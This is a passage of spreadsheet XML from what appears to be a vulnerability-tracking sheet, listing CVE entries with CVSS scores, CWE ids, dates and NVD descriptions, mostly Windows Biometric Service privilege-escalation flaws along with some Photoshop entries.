authorized attacker to elevate privileges locally.</t></is></c><c r="T599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t></is></c></row><row r="600"><c r="A600" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C600" s="5" t="inlineStr"><is><t>CVE-2026-72991</t></is></c><c r="D600" s="5" t="n"><v>7.8</v></c><c r="E600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F600" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G600" s="5" t="inlineStr" /><c r="H600" s="5" t="n"><v>0.003</v></c><c r="I600" s="5" t="inlineStr" /><c r="J600" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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0" s="5" t="inlineStr" /><c r="M600" s="5" t="inlineStr" /><c r="N600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P600" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q600" s="5" t="inlineStr" /><c r="R600" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S600" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t></is></c></row><row r="601"><c r="A601" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C601" s="5" t="inlineStr"><is><t>CVE-2026-72992</t></is></c><c r="D601" s="5" t="n"><v>7.8</v></c><c r="E601" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F601" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G601" s="5" t="inlineStr" /><c r="H601" s="5" t="n"><v>0.003</v></c><c r="I601" s="5" t="inlineStr" /><c r="J601" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M601" s="5" t="inlineStr" /><c r="N601" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P601" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q601" s="5" t="inlineStr" /><c r="R601" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S601" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t></is></c></row><row r="602"><c r="A602" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C602" s="5" t="inlineStr"><is><t>CVE-2026-72993</t></is></c><c r="D602" s="5" t="n"><v>7.8</v></c><c r="E602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F602" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G602" s="5" t="inlineStr" /><c r="H602" s="5" t="n"><v>0.002</v></c><c r="I602" s="5" t="inlineStr" /><c r="J602" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M602" s="5" t="inlineStr" /><c r="N602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P602" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q602" s="5" t="inlineStr" /><c r="R602" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S602" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t></is></c></row><row r="603"><c r="A603" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C603" s="5" t="inlineStr"><is><t>CVE-2026-72994</t></is></c><c r="D603" s="5" t="n"><v>7.8</v></c><c r="E603" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F603" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G603" s="5" t="inlineStr" /><c r="H603" s="5" t="n"><v>0.002</v></c><c r="I603" s="5" t="inlineStr" /><c r="J603" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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3" s="5" t="inlineStr" /><c r="M603" s="5" t="inlineStr" /><c r="N603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P603" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q603" s="5" t="inlineStr" /><c r="R603" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S603" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t></is></c></row><row r="604"><c r="A604" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C604" s="5" t="inlineStr"><is><t>CVE-2026-72995</t></is></c><c r="D604" s="5" t="n"><v>7.8</v></c><c r="E604" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F604" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G604" s="5" t="inlineStr" /><c r="H604" s="5" t="n"><v>0.002</v></c><c r="I604" s="5" t="inlineStr" /><c r="J604" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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4" s="5" t="inlineStr" /><c r="M604" s="5" t="inlineStr" /><c r="N604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q604" s="5" t="inlineStr" /><c r="R604" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S604" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t></is></c></row><row r="605"><c r="A605" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C605" s="5" t="inlineStr"><is><t>CVE-2026-72996</t></is></c><c r="D605" s="5" t="n"><v>7.8</v></c><c r="E605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F605" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G605" s="5" t="inlineStr" /><c r="H605" s="5" t="n"><v>0.003</v></c><c r="I605" s="5" t="inlineStr" /><c r="J605" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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5" s="5" t="inlineStr" /><c r="M605" s="5" t="inlineStr" /><c r="N605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P605" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q605" s="5" t="inlineStr" /><c r="R605" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S605" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t></is></c></row><row r="606"><c r="A606" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C606" s="5" t="inlineStr"><is><t>CVE-2026-72997</t></is></c><c r="D606" s="5" t="n"><v>7.8</v></c><c r="E606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F606" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G606" s="5" t="inlineStr" /><c r="H606" s="5" t="n"><v>0.003</v></c><c r="I606" s="5" t="inlineStr" /><c r="J606" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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6" s="5" t="inlineStr" /><c r="M606" s="5" t="inlineStr" /><c r="N606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P606" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q606" s="5" t="inlineStr" /><c r="R606" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S606" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t></is></c></row><row r="607"><c r="A607" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C607" s="5" t="inlineStr"><is><t>CVE-2026-73000</t></is></c><c r="D607" s="5" t="n"><v>7.8</v></c><c r="E607" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F607" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G607" s="5" t="inlineStr" /><c r="H607" s="5" t="n"><v>0.002</v></c><c r="I607" s="5" t="inlineStr" /><c r="J607" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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7" s="5" t="inlineStr" /><c r="M607" s="5" t="inlineStr" /><c r="N607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P607" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q607" s="5" t="inlineStr" /><c r="R607" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S607" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t></is></c></row><row r="608"><c r="A608" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C608" s="5" t="inlineStr"><is><t>CVE-2026-73001</t></is></c><c r="D608" s="5" t="n"><v>7.8</v></c><c r="E608" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F608" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G608" s="5" t="inlineStr" /><c r="H608" s="5" t="n"><v>0.003</v></c><c r="I608" s="5" t="inlineStr" /><c r="J608" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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8" s="5" t="inlineStr" /><c r="M608" s="5" t="inlineStr" /><c r="N608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P608" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q608" s="5" t="inlineStr" /><c r="R608" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S608" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t></is></c></row><row r="609"><c r="A609" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C609" s="5" t="inlineStr"><is><t>CVE-2026-73002</t></is></c><c r="D609" s="5" t="n"><v>7.8</v></c><c r="E609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F609" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G609" s="5" t="inlineStr" /><c r="H609" s="5" t="n"><v>0.002</v></c><c r="I609" s="5" t="inlineStr" /><c r="J609" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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9" s="5" t="inlineStr" /><c r="M609" s="5" t="inlineStr" /><c r="N609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P609" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q609" s="5" t="inlineStr" /><c r="R609" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S609" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t></is></c></row><row r="610"><c r="A610" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C610" s="5" t="inlineStr"><is><t>CVE-2026-73007</t></is></c><c r="D610" s="5" t="n"><v>7.8</v></c><c r="E610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F610" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G610" s="5" t="inlineStr" /><c r="H610" s="5" t="n"><v>0.002</v></c><c r="I610" s="5" t="inlineStr" /><c r="J610" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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0" s="5" t="inlineStr" /><c r="M610" s="5" t="inlineStr" /><c r="N610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P610" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q610" s="5" t="inlineStr" /><c r="R610" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S610" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t></is></c></row><row r="611"><c r="A611" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C611" s="5" t="inlineStr"><is><t>CVE-2026-73011</t></is></c><c r="D611" s="5" t="n"><v>7.8</v></c><c r="E611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F611" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G611" s="5" t="inlineStr" /><c r="H611" s="5" t="n"><v>0.002</v></c><c r="I611" s="5" t="inlineStr" /><c r="J611" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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1" s="5" t="inlineStr" /><c r="M611" s="5" t="inlineStr" /><c r="N611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P611" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q611" s="5" t="inlineStr" /><c r="R611" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S611" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t></is></c></row><row r="612"><c r="A612" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C612" s="5" t="inlineStr"><is><t>CVE-2026-73014</t></is></c><c r="D612" s="5" t="n"><v>7.8</v></c><c r="E612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F612" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G612" s="5" t="inlineStr" /><c r="H612" s="5" t="n"><v>0.003</v></c><c r="I612" s="5" t="inlineStr" /><c r="J612" s="5" t="inlineStr" /><c r="K612" s="5" t="inlineStr" /><c r="L612" s="5" t="inlineStr" /><c r="M612" s="5" t="inlineStr" /><c r="N612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P612" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q612" s="5" t="inlineStr" /><c r="R612" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S612" s="5" t="inlineStr"><is><t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t></is></c></row><row r="613"><c r="A613" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C613" s="5" t="inlineStr"><is><t>CVE-2026-73015</t></is></c><c r="D613" s="5" t="n"><v>7.8</v></c><c r="E613" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F613" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G613" s="5" t="inlineStr" /><c r="H613" s="5" t="n"><v>0.002</v></c><c r="I613" s="5" t="inlineStr" /><c r="J613" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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3" s="5" t="inlineStr" /><c r="M613" s="5" t="inlineStr" /><c r="N613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P613" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q613" s="5" t="inlineStr" /><c r="R613" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S613" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t></is></c></row><row r="614"><c r="A614" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C614" s="5" t="inlineStr"><is><t>CVE-2026-73020</t></is></c><c r="D614" s="5" t="n"><v>7.8</v></c><c r="E614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F614" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G614" s="5" t="inlineStr" /><c r="H614" s="5" t="n"><v>0.002</v></c><c r="I614" s="5" t="inlineStr" /><c r="J614" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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4" s="5" t="inlineStr" /><c r="M614" s="5" t="inlineStr" /><c r="N614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P614" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q614" s="5" t="inlineStr" /><c r="R614" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S614" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t></is></c></row><row r="615"><c r="A615" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C615" s="5" t="inlineStr"><is><t>CVE-2026-73021</t></is></c><c r="D615" s="5" t="n"><v>7.8</v></c><c r="E615" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F615" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G615" s="5" t="inlineStr" /><c r="H615" s="5" t="n"><v>0.003</v></c><c r="I615" s="5" t="inlineStr" /><c r="J615" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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5" s="5" t="inlineStr" /><c r="M615" s="5" t="inlineStr" /><c r="N615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P615" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q615" s="5" t="inlineStr" /><c r="R615" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S615" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t></is></c></row><row r="616"><c r="A616" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C616" s="5" t="inlineStr"><is><t>CVE-2026-73024</t></is></c><c r="D616" s="5" t="n"><v>7.8</v></c><c r="E616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F616" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G616" s="5" t="inlineStr" /><c r="H616" s="5" t="n"><v>0.002</v></c><c r="I616" s="5" t="inlineStr" /><c r="J616" s="5" t="inlineStr" /><c r="K616" s="5" t="inlineStr" /><c r="L616" s="5" t="inlineStr" /><c r="M616" s="5" t="inlineStr" /><c r="N616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P616" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q616" s="5" t="inlineStr" /><c r="R616" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S616" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t></is></c></row><row r="617"><c r="A617" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C617" s="5" t="inlineStr"><is><t>CVE-2026-73026</t></is></c><c r="D617" s="5" t="n"><v>7.8</v></c><c r="E617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F617" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G617" s="5" t="inlineStr" /><c r="H617" s="5" t="n"><v>0.002</v></c><c r="I617" s="5" t="inlineStr" /><c r="J617" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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7" s="5" t="inlineStr" /><c r="M617" s="5" t="inlineStr" /><c r="N617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P617" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q617" s="5" t="inlineStr" /><c r="R617" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S617" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t></is></c></row><row r="618"><c r="A618" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C618" s="5" t="inlineStr"><is><t>CVE-2026-7476</t></is></c><c r="D618" s="5" t="n"><v>7.8</v></c><c r="E618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F618" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G618" s="5" t="inlineStr" /><c r="H618" s="5" t="n"><v>0.001</v></c><c r="I618" s="5" t="inlineStr" /><c r="J618" s="5" t="inlineStr" /><c r="K618" s="5" t="inlineStr" /><c r="L618" s="5" t="inlineStr" /><c r="M618" s="5" t="inlineStr" /><c r="N618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P618" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q618" s="5" t="inlineStr" /><c r="R618" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S618" s="5" t="inlineStr"><is><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is></c><c r="T618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t></is></c></row><row r="619"><c r="A619" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C619" s="5" t="inlineStr"><is><t>CVE-2026-7477</t></is></c><c r="D619" s="5" t="n"><v>7.8</v></c><c r="E619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F619" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G619" s="5" t="inlineStr" /><c r="H619" s="5" t="n"><v>0.001</v></c><c r="I619" s="5" t="inlineStr" /><c r="J619" s="5" t="inlineStr" /><c r="K619" s="5" t="inlineStr" /><c r="L619" s="5" t="inlineStr" /><c r="M619" s="5" t="inlineStr" /><c r="N619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P619" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q619" s="5" t="inlineStr" /><c r="R619" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S619"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is></c><c r="T619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t></is></c></row><row r="620"><c r="A620" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C620" s="5" t="inlineStr"><is><t>CVE-2026-75631</t></is></c><c r="D620" s="5" t="n"><v>7.8</v></c><c r="E620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F620" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G620" s="5" t="inlineStr" /><c r="H620" s="5" t="n"><v>0.002</v></c><c r="I620" s="5" t="inlineStr" /><c r="J620" s="5" t="inlineStr" /><c r="K620" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L620" s="5" t="inlineStr" /><c r="M620" s="5" t="inlineStr" /><c r="N620" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P620" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q620" s="5" t="inlineStr" /><c r="R620" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S620" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t></is></c></row><row r="621"><c r="A621" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C621" s="5" t="inlineStr"><is><t>CVE-2026-75771</t></is></c><c r="D621" s="5" t="n"><v>7.8</v></c><c r="E621" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F621" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G621" s="5" t="inlineStr" /><c r="H621" s="5" t="n"><v>0.002</v></c><c r="I621" s="5" t="inlineStr" /><c r="J621" s="5" t="inlineStr" /><c r="K621" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L621" s="5" t="inlineStr" /><c r="M621" s="5" t="inlineStr" /><c r="N621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P621" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q621" s="5" t="inlineStr" /><c r="R621" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S62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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t></is></c></row><row r="622"><c r="A622" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C622" s="5" t="inlineStr"><is><t>CVE-2026-75862</t></is></c><c r="D622" s="5" t="n"><v>7.8</v></c><c r="E622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F622" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G622" s="5" t="inlineStr" /><c r="H622" s="5" t="n"><v>0.002</v></c><c r="I622" s="5" t="inlineStr" /><c r="J622" s="5" t="inlineStr" /><c r="K622" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L622" s="5" t="inlineStr" /><c r="M622" s="5" t="inlineStr" /><c r="N622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P622" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q622" s="5" t="inlineStr" /><c r="R622" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S622"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t></is></c></row><row r="623"><c r="A623" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B623" s="5" 